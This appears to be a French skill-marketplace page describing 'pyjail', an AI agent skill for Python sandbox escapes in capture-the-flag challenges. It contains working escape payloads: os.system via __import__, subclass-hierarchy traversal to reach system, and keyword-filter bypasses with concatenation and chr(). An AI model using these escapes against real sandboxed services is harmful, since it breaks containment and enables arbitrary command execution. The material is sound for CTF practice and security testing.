Notre avis
Ce skill permet d'échapper aux restrictions d'un environnement Python sandboxé (jail) en utilisant des techniques de contournement de filtres et d'accès aux modules interdits.
Points forts
- Propose des techniques de contournement classiques comme l'utilisation de la hiérarchie de classes.
- Inclut des références détaillées (bypass.md, payloads.md) pour aller plus loin.
- Fournit une aide au débogage pour trouver les indices de classes utiles.
Limites
- Les indices de classes varient selon les versions de Python, nécessitant une adaptation.
- Ne couvre pas tous les types de filtres (caractères interdits, longueur limitée).
- Suppose que l'environnement permet encore l'évaluation de code Python.
Utilisez ce skill lorsque vous devez exécuter des commandes ou lire des fichiers dans un environnement Python avec des restrictions de type 'jail'.
Ne l'utilisez pas si les restrictions sont trop strictes (pas d'accès à eval/exec, filtres très restrictifs) ou si vous n'êtes pas dans un contexte de sandbox Python.
Analyse de sécurité
PrudenceThe skill provides a variety of Python code snippets for escaping restricted eval/exec environments, which can lead to arbitrary command execution. While intended for legitimate security testing, such capabilities are powerful and could cause harm if used inappropriately.
- •enables arbitrary command execution via Python's os.system and other escapes
- •could be used to bypass security restrictions in production if misused
Exemples
I have a Python jail that allows eval but blocks '__import__' and 'os'. How can I run a system command to read 'flag.txt'?The jail blocks the word 'system' and 'import'. Help me construct a payload using concatenation or chr() to execute 'cat flag.txt'.I need to use the class hierarchy to access subclasses and find one with 'popen' or 'wrap' to execute commands. Show me how to enumerate and find the right index.name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob
Python Jail Escape Skill
Quick Workflow
Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag
Quick Reference - Common Escapes
# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")
# Using breakpoint (Python 3.7+)
breakpoint() # Drops into pdb, then !cat flag.txt
# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')
# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
Reference Files
| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |
Quick Debugging
# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
if 'wrap' in str(c): print(i, c)
# Check available builtins
dir(__builtins__)
Auditeur de Securite
Securite
Analyse le code pour detecter les vulnerabilites OWASP Top 10.
Checklist de Sécurité OWASP
Securite
Génère des checklists de sécurité applicative basées sur l'OWASP Top 10.
Modélisation de Menaces
Securite
Génère des documents de modélisation de menaces avec analyse STRIDE.